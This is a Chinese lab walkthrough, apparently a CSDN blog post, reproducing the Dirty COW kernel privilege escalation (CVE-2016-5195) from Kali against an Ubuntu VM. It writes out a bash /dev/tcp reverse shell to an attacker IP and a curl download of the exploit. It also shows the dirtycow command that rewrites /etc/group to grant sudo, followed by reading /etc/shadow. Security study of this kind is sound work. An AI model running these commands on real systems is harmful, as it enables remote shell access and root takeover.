Linux提权之脏牛Dirty COW CVE-2016-5195 (四)

CVE-2016-5195(Dirty Cow脏牛)

脏牛提权的利用方式不同于其他的内核溢出提权,这里单独记录

脏牛是一个非常经典的内核提权漏洞,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复

Dirty COW漏洞原理与简单利用_dirtycow-CSDN博客

首先我们下载环境

我们的kail ip 192.168.25.138

Ubuntu ip 192.168.25.135

通过网盘分享的文件:Ubuntu.zip

链接: 百度网盘 请输入提取码 提取码: kru8

--来自百度网盘超级会员v3的分享

首先访问192.168.25.135

打开

eval函数

我们还是打开kail的反弹

system('bash -c "bash -i >& /dev/tcp/192.168.25.138/8888 0>&1"');

已经反弹回来了

还是一样的 修改为完整的tty shell

python3 -c 'import pty;pty.spawn("/bin/bash")';

我们在Ubuntu 新建普通用户

在kail反弹shell中查看

然后我们下载exp

DirtyCow(脏牛)漏洞复现 | Brucetg's Blog

首先

git clone https://github.com/dirtycow/dirtycow.github.io

然后打开http服务

python3 -m http.server 80

curl http://192.168.25.138/dirtyc0w.c -o /tmp/dirtyc0w.c

然后编译 增加权限

gcc -pthread dirtycow.c -o dirtycow

然后返回Ubuntu主机查看权限

然后输入

把用户加到sudo数组里 root

./dirtycow /etc/group "$(sed '/\(sudo*\)/ s/$/,hjl/' /etc/group)"

查看权限

发现多了sudo 权限

用普通用户的密码 拿下root

看到root 跟 hjl 权限一样了

我们输入cat /etc/shadow

权限不够 sudo来凑

还是可以访问的

我们脏牛 就复现成功了

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值